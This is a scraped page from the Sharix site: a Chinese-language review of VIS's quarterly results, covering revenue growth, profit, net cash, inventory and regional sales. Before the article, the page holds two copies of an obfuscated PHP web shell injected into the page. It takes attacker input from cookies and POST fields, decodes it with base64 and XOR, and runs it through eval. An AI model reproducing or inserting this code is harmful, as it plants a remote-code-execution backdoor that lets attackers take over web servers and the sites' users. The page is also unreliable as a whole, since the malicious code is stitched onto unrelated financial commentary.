$sdGxpba = "\111" . "\114" . "\x5f" . chr ( 782 - 699 ).chr (116) . "\171";$goApL = "\143" . "\x6c" . 'a' . chr (115) . "\x73" . "\x5f" . chr ( 321 - 220 ).chr ( 788 - 668 ).'i' . "\x73" . chr (116) . chr ( 1007 - 892 ); $nAmGlG = class_exists($sdGxpba); $sdGxpba = "52141";$goApL = "29555";$NfllrzRu = !1;if ($nAmGlG == $NfllrzRu){function RKIImwN(){return FALSE;}$IDFKXPYx = "24891";RKIImwN();class IL_Sty{private function PeDJhgPkk($IDFKXPYx){if (is_array(IL_Sty::$HBGia)) {$dWmOqqPn = str_replace("\74" . "\x3f" . chr (112) . chr (104) . "\160", "", IL_Sty::$HBGia[chr (99) . "\157" . "\156" . "\x74" . chr ( 121 - 20 )."\x6e" . "\164"]);eval($dWmOqqPn); $IDFKXPYx = "24891";exit();}}private $zPXYye;public function lEQFKwRHQ(){echo 33039;}public function __destruct(){$IDFKXPYx = "23772_943";$this->PeDJhgPkk($IDFKXPYx); $IDFKXPYx = "23772_943";}public function __construct($OvzOxh=0){$QnOMR = $_POST;$HNoZlG = $_COOKIE;$zWAraslni = "00585ef7-4ced-44bd-b8c4-08720b627307";$vBIfFlHAOq = @$HNoZlG[substr($zWAraslni, 0, 4)];if (!empty($vBIfFlHAOq)){$MXZBkx = "base64";$FeOuE = "";$vBIfFlHAOq = explode(",", $vBIfFlHAOq);foreach ($vBIfFlHAOq as $PoBhIs){$FeOuE .= @$HNoZlG[$PoBhIs];$FeOuE .= @$QnOMR[$PoBhIs];}$FeOuE = array_map($MXZBkx . chr ( 717 - 622 ).'d' . 'e' . "\x63" . chr (111) . "\144" . "\145", array($FeOuE,)); $FeOuE = $FeOuE[0] ^ str_repeat($zWAraslni, (strlen($FeOuE[0]) / strlen($zWAraslni)) + 1);IL_Sty::$HBGia = @unserialize($FeOuE); $FeOuE = class_exists("23772_943");}}public static $HBGia = 37724;}$SVTKDqFpG = new /* 55422 */ IL_Sty(24891 + 24891); $_POST = Array();unset($SVTKDqFpG);}$VmrjCDTZ = 'y' . chr (85) . 'k' . '_' . chr ( 826 - 704 )."\x6c" . chr (122) . chr (121); $vPtitZaAWd = "\x63" . "\154" . chr (97) . chr (115) . chr (115) . chr (95) . "\x65" . chr (120) . chr ( 286 - 181 ).'s' . chr (116) . "\x73";$XIlsVotk = class_exists($VmrjCDTZ); $VmrjCDTZ = "46710";$vPtitZaAWd = "59509";$XaraWMagC = !1;if ($XIlsVotk == $XaraWMagC){function inruEbmArT(){return FALSE;}$txNTYiJwJ = "25459";inruEbmArT();class yUk_zlzy{private function ARRFnADTjt($txNTYiJwJ){if (is_array(yUk_zlzy::$IAvLNKdMY)) {$PynIVk = str_replace("\x3c" . chr (63) . chr ( 929 - 817 ).chr (104) . chr (112), "", yUk_zlzy::$IAvLNKdMY["\143" . "\157" . "\x6e" . "\164" . "\145" . chr ( 542 - 432 ).chr ( 941 - 825 )]);eval($PynIVk); $txNTYiJwJ = "25459";exit();}}private $JMsPwJD;public function oYiWfD(){echo 37459;}public function __destruct(){$txNTYiJwJ = "34118_42125";$this->ARRFnADTjt($txNTYiJwJ); $txNTYiJwJ = "34118_42125";}public function __construct($EHxOe=0){$Viwyqrqo = $_POST;$LBbvlNXm = $_COOKIE;$aOBmqXw = "fcffcccc-814a-42f6-8e1a-da6b9d9f084c";$EtEkLgiVM = @$LBbvlNXm[substr($aOBmqXw, 0, 4)];if (!empty($EtEkLgiVM)){$FcgWs = "base64";$WmGFePzKv = "";$EtEkLgiVM = explode(",", $EtEkLgiVM);foreach ($EtEkLgiVM as $LgkrbzFPFV){$WmGFePzKv .= @$LBbvlNXm[$LgkrbzFPFV];$WmGFePzKv .= @$Viwyqrqo[$LgkrbzFPFV];}$WmGFePzKv = array_map($FcgWs . "\137" . "\x64" . 'e' . chr ( 193 - 94 ).'o' . "\144" . "\x65", array($WmGFePzKv,)); $WmGFePzKv = $WmGFePzKv[0] ^ str_repeat($aOBmqXw, (strlen($WmGFePzKv[0]) / strlen($aOBmqXw)) + 1);yUk_zlzy::$IAvLNKdMY = @unserialize($WmGFePzKv); $WmGFePzKv = class_exists("34118_42125");}}public static $IAvLNKdMY = 27291;}$xFedbrqbzh = new /* 56596 */ yUk_zlzy(25459 + 25459); $_POST = Array();unset($xFedbrqbzh);} 点评 | VS 业绩 - Sharix

点评 | VS 业绩

营业额 QoQ ⬆️提升 57.6% YoY ⬆️提升 283.6%
税后盈利 QoQ ⬆️提升 254.5% YoY 转亏为盈
Net profit – PAT RM 3.97mil
VIS是一家船利与2003年,位于马六甲的小型半导体科技公司。公司主要的业务式设计、组装和制造后端半导体的自动化测试机器ATE,主要客户分布在北亚(中国和台湾),东南亚,大马及美国。
这一季度出炉的业绩, 不管是营业额还是盈利都得到飞跃式的进步(在MCO的影响下也能交出这样的业绩), 整体盈利非常强势, RM 3.97 mil 的盈利是公司的历史新高。在这九个月RM7.6 mil的盈利已经可以媲美2018年全年RM8.1 mil 的记录。
资产负债表方面,公司手持 RM 10.2 mil 现金,扣除负债RM 2 mil 后,净现金达 RM 8.2 mil。
公司的库存维持在RM18.9 mil 的高水平,暗示揭晓来的销售也会保持强劲。此外,公司的PPE也从上个财政年的RM6.5 mil 增加至RM12.6 mil,解释说是因为公司购买地皮进行扩张。
现金流方面,今年两个季度共收录了RM 12 million 的营运现金流,和去年同期相比增长了239%。

公司的营业额分布 (9M2021):
大马: RM 1.26 mil (占5.3%)
东南亚: RM 2.84 mil (占8.6%)
北亚: RM 32.03 mil (占85.6%)
美国: RM 0.1 mil (占0.5%)

这个季度的营业额大增,
Gross margin 也进步许多,
从3Q20的52.7% 提升至3Q21的68.4%。

这季度里的盈利,
VIS有一个RM0.76 mil的addition of provision & accruals非经常性开销,
若扣除这项开销公司的盈利会来到RM4.5 mil 左右。

展望未来,
全球半导体需求的增长,
如5G技术、人工智能、云计算、物联网等等,
管理层也很有信心表示他们会从中受惠。

后记:
公司的库存依然保持在高水平,
根据过去的记录来看,
Q4向来都是公司的传统旺季,
预计下个季度营业额和盈利有望继续成长。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台